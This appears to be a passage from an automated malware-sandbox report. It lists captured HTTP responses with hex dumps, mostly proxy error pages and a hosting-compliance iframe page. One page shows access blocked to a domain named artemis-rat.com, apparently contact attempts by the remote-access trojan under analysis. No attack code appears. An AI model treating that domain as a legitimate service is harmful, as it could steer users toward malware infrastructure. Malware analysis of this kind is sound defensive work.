                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:55 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:56 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/5.6Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:56 GMTContent-Type: text/html;charset=utf-8Content-Length: 3773X-Squid-Error: ERR_CONNECT_FAIL 101Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2021 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" CONTENT="text/html; charset=utf-8"><titl
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/3.5.27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:56 GMTContent-Type: text/html;charset=utf-8Content-Length: 3832X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>E
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:56 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.28Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:56 GMTContent-Type: text/html;charset=utf-8Content-Length: 952X-Squid-Error: ERR_ACCESS_DENIED 0Content-Language: enX-Cache: MISS from ah_testVia: 1.1 ah_test (squid/3.5.28)Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 53
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:56 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
